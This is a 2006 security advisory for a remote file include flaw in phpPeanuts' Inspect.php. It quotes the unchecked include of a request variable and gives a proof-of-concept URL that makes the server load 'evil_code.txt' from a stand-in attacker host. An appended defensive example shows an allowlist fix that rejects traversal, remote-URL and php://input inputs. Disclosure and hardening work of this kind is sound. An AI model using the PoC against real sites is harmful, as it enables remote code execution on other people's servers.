# Title : phpPeanuts 1.3 Beta (Inspect.php) Remote File Include Vulnerability
# Published : 2006-11-14
# Author : Hidayat Sagita
.:: Preface ::.
Type : Remote File Include
Scripts : Phppeanuts 1.1
Download : http://scripts.ringsworld.com/development-tools/phppeanuts-1-1.zip
Founder : Hidayat Sagita aka bomm_3x
Contact : hidayat.sagita[at]gmail[dot]com
.:: What ? ::.
In the Inspect.php file, on lines :
4. if ( isSet($_REQUEST["Include"]) )
5. include $_REQUEST["Include"];
The "Include" request variable is not verified before being passed to include.
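Added example (not part of the original advisory and not phpPeanuts code): one way to close this include is to map the request value onto a fixed allowlist of local files instead of passing it to include directly. The function name resolveInclude, the allowlist key and the sample inputs are assumptions made for illustration.

```php
<?php
// Added example: hardened replacement for lines 4-5 of Inspect.php.
// resolveInclude() and the allowlist contents are hypothetical names.

/**
 * Map a request-supplied name to a local file from a fixed allowlist.
 * Returns the absolute path, or null when the name must be rejected.
 */
function resolveInclude($name, array $allowed, $baseDir)
{
    // Only exact allowlist keys pass. URLs, stream wrappers and
    // traversal strings are never keys, so they are rejected here.
    if (!is_string($name) || !array_key_exists($name, $allowed)) {
        return null;
    }
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    // realpath() resolves symlinks and ".." and fails on missing files.
    $path = realpath($base . DIRECTORY_SEPARATOR . $allowed[$name]);
    $prefix = $base . DIRECTORY_SEPARATOR;
    if ($path === false || strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null; // target is missing or escapes the base directory
    }
    return $path;
}

// Constructed demo: the allowlist holds one entry pointing at this file.
$allowed = array('self' => basename(__FILE__));
$samples = array('self', 'http://example.invalid/x.txt',
                 '../../etc/passwd', 'php://input');
foreach ($samples as $in) {
    $ok = resolveInclude($in, $allowed, __DIR__) !== null;
    printf("%-30s => %s\n", $in, $ok ? 'allowed' : 'rejected');
}

// At the call site in Inspect.php the pattern would be:
//   $p = isset($_REQUEST['Include'])
//      ? resolveInclude($_REQUEST['Include'], $allowed, __DIR__) : null;
//   if ($p !== null) { include $p; }
//
// Defence in depth: keep allow_url_include = Off in php.ini so that
// include cannot fetch remote URLs even if a check like this is missed.
```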
.:: Proof Of Concept ::.
http://site/[phppeanuts_path]/pntUnit/Inspect.php?Include=http://yoursite/evil_code.txt ?
.:: Shoutz ::.
eCHo staff, az001 and All newbz.
# www.Syue.com [2006-11-14]